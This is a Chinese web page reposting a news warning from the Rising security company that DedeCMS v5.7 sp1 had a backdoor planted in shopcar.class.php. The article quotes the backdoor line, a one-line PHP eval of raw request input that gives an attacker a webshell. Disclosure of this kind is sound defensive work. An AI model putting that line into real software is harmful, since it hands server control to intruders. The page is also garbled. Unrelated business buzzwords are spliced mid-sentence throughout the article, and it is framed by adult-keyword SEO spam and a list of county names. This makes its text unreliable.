国产精品一区二区三区四区五区|国产精品另类激情久久久免费,99久久99久久精品免费看蜜桃|欧美性受xxxx_亚洲Av无码专区国产乱码不卡|久久久久国产一区二区三区

返回頂部
關(guān)閉軟件導(dǎo)航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

瑞星公司今日對外發(fā)布緊急警示:國內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門核心技術,黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限應用提升,獲取存儲在服務(wù)器上的文件和數(shù)據(jù)庫。據(jù)CMS官方數(shù)據(jù)顯示創造性,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建發展的關鍵,涉及企業(yè)、政府機(jī)關(guān)規模設備、媒體機(jī)構(gòu)真諦所在、行業(yè)及個(gè)人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員競爭力,使用瑞星網(wǎng)站密碼安全檢測系統(tǒng)查找后門并及時(shí)進(jìn)行封堵倍增效應。

wangluo1.jpg  

  據(jù)專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”製造業。通過利用這個(gè)后門優化服務策略,黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell發展基礎,通過對服務(wù)器進(jìn)一步滲透攻擊兩個角度入手,進(jìn)而獲取服務(wù)器的最高權(quán)限。

  

  織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網(wǎng)站后同期,便可以直接訪問服務(wù)器上的文件生產效率、數(shù)據(jù)庫等信息。目前我國有大量網(wǎng)站采用該系統(tǒng)效果,此后門或?qū)?dǎo)致大量用戶的信息泄露滿意度,造成極為嚴(yán)重的影響。

如果您覺得 織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保 這篇文章對您有用可持續,請分享給您的好友主要抓手,謝謝
文章地址:http://www.61py.com/article/dede/1066.html
解放雙手無盡可能,有問題添加天線貓微信
三门峡市| 松阳县| 邵阳市| 凌云县| 哈巴河县| 嘉善县| 句容市| 黄浦区| 阳曲县| 梅州市| 孙吴县| 澜沧| 新郑市| 安塞县| 旬邑县| 富源县| 柞水县| 雷波县| 林州市| 灵丘县| 疏勒县| 西华县| 合作市| 奉新县| 大埔县| 南溪县| 苏尼特右旗| 金沙县| 朝阳县| 扶余县| 克拉玛依市| 胶州市| 铅山县| 烟台市| 进贤县| 南溪县| 温宿县| 怀安县| 屯昌县| 台前县| 灯塔市|